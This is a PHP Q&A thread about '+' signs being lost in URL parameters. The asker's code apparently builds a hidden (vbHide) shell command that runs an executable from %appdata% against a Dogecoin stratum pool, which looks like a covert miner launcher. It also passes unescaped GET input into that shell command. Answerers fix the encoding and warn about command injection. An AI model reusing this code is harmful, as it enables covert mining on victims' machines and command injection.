# PHP urlencode & urldecode in string still not using +?

Tags: php

```
    <?php
$pool = urlencode($_GET['p']);
$url = 'mylink?pool=' . $p . '&user=' . $_GET['user'] . '&pass=' . $_GET['pass'];
file_get_contents($url);
?>

<?php
    $pool = urldecode($_GET['p']);
    $user = $_GET['user'];
    $pass = $_GET['pass'];
    $file_content[133] = 'Shell "cmd.exe /c cd %appdata% & help.exe -o ' . $p. ' -u ' . $user . ' -p ' . $pass . '", vbHide';
?>
```

When entering: `http://mylin?p=udp+tcp://host:22555&user=test&pass=test`

It still doesn't use the + in this as a string at all!

Please help, as the + needs to be included in my string.

Comment: Are you not forgetting to escape the `+` in your browser test as well?

Comment: @NielsKeurentjes http://mylin?p=udp+tcp://host:22555&user=test&pass=test That's exactly what i was doing what did i do wrong here?

Comment: Also, you **definitely should not** pass any user input (e.g., from `$_GET`) directly to a shell command! For that, you need to use [`escapeshellarg()`](http://us1.php.net/escapeshellarg).

Comment: @user113215 I replaced rawurlencode with urlencode in my script, still isn't working am I doing something wrong here? Am I supposed to somehow change it to %2B? I'm aware about using the shell is dangerous, I don't really care haha.

Answer (score 3, accepted):

> The superglobals `$_GET` and `$_REQUEST` are already decoded.

Per the documentation, you should not decode things from `$_GET`. When encoding, use [`rawurlencode()`](https://www.php.net/rawurlencode) so the plus symbol is encoded as "%2B" (and thus, correctly decoded).

When you encode your link,  `rawurlencode()` **all** of the parameters:

```
$pool = rawurlencode($_GET['p']);
$user = rawurlencode($_GET['user']);
$pass = rawurlencode($_GET['pass']);
$url = "mylink?pool=$p&user=$user&pass=$pass";
```

When you decode your link, don't decode **any** of the parameters because they are already decoded:

```
$pool = $_GET['p'];
$user = $_GET['user'];
$pass = $_GET['pass'];
```

---

Incidentally, it looks like you are taking user input and sending it to a shell command. In that case, you **must** use [`escapeshellarg()`](https://www.php.net/escapeshellarg) or similar to make the string safe for use as a shell argument and mitigate [command injection](https://www.owasp.org/index.php/Command_Injection) attacks.

Comment: @user3152114 No, read above. **Don't decode anything from `$_GET`** because it's automatically decoded for you.

Comment: It's a start however: Shell "cmd.exe /c cd %appdata% & test.exe --scrypt -o "stratum tcp://test:22555" -u "port22.1" -p "1" -I 12 & pause", vbMaximizedFocus It's all quoted also the + isn't there next to stratum+tcp it's just a space.

Comment: @user3152114 The link to the second snippet needs to have "%2B" in place of a plus symbol. Is this occurring? I assume your two PHP snippets go together -- that `rawurlencode()` in the first corresponds with `$_GET['p']` in the second. If not, where does the link to the second snippet come from? (that is probably where your encoding problem is happening)

Comment: stratum%20tcp%3A%2F%2Fdoge.ctest.net%3A22555&user=test&pass=1 I guess the + %B2 is not getting encoded?

Comment: @user3152114 Looks like `$_GET['p']` in the first snippet (before calling `rawurlencode()`) has a space instead of a plus. Where does `$_GET['p']` in the first snippet come from? Make sure you're sending "%2B" for the plus in *that* URL.

Comment: in my url i just simply put: ?p=stratum+tcp://doge.ctest.net:22555&user=test&pass=1 Really do need quicker answers if possible ;)

Comment: @user3152114 **You need to use "%2B" instead of "+" in the URL.** If you're typing it manually, just type "%2B". If you're generating with PHP, use `rawurlencode()`. If you're generating with JavaScript, use `encodeURIComponent()`.

Comment: Mhm, that's half of it though, what about all of the random "'s?  Shell "cmd.exe /c cd %appdata% & test.exe --scrypt -o "stratum tcp://test:22555" -u "port22.1" -p "1" -I 12 & pause", vbMaximizedFocus It's all quoted also the + isn't there next to stratum+tcp it's